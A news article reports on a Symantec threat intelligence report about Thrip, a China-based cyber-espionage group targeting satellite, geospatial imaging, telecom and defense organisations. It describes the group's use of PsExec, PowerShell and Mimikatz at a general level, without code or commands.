A “wide-ranging” cyber-espionage campaign has been launched by a China-based group known as Thrip, according to a Threat Intelligence report released from cybersecurity giant Symantec.
The attacks were first detected early this year but a Symantec spokesperson told Fox News that they have confirmed activity through May.
Symantec identified three computers in China used to launch the attacks. “Thrip’s motive is likely espionage and its targets include those in the communications, geospatial imaging, and defense sectors, both in the United States and Southeast Asia,” according to the report.
Symantec declined to identify the companies.
Satellite communications operator targeted
One of the most disturbing attacks was directed at a satellite communications operator, Symantec said.
“The attack group seemed to be particularly interested in the operational side of the company, looking for and infecting computers running software that monitors and controls satellites, “Symantec said. “This suggests to us that Thrip’s motives go beyond spying and may also include disruption.”
Another target was an organization involved in geospatial imaging and mapping. In this case, Thrip targeted computers running MapXtreme GIS (Geographic Information System) as well as machines running Google Earth Server and Garmin imaging software.
Other targets included three different telecoms operators, all based in Southeast Asia.
“In all cases…it appeared that the telecoms companies themselves and not their customers were the targets of these attacks,” Symantec added.
There was also a defense contractor that was targeted. When asked by Fox News, Symantec would not elaborate on the nature of the threat or the defense contractor’s identity.
Going on since 2013
In 2013, Symantec initially discovered the China-based Thrip spying campaign. Since then, the group has changed tactics, Symantec said. Thrip has switched from using custom malware to a mixture of custom malware and so-called “living off the land” tools – that latter is what Symantec describes as the use of legitimate operating system features and network administration tools to compromise victims’ networks.This helps to mask a bad actor’s activity.
Some of those tools include PsExec, a Microsoft tool. The attackers were using the Microsoft software to attempt to remotely install malware. “When we analyzed the malware, we discovered that it was an updated version of Trojan.Rikamanu, malware associated with Thrip,” Symantec said.
Another legitimate program is PowerShell, a Microsoft scripting tool “that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance,” according to Symantec.
Other “freely-available” tools are also employed like Mimikatz, which is often used maliciously to change privileges, export security certificates, and recover Windows passwords.
To detect attacks, Symantec developed a technology called Targeted Attack Analytics, or TAA, which uses artificial intelligence and machine learning to spot attackers employing tools that are ostensibly innocuous.
“It was TAA that led us to the latest cyber espionage campaign we’ve uncovered,” Symantec said.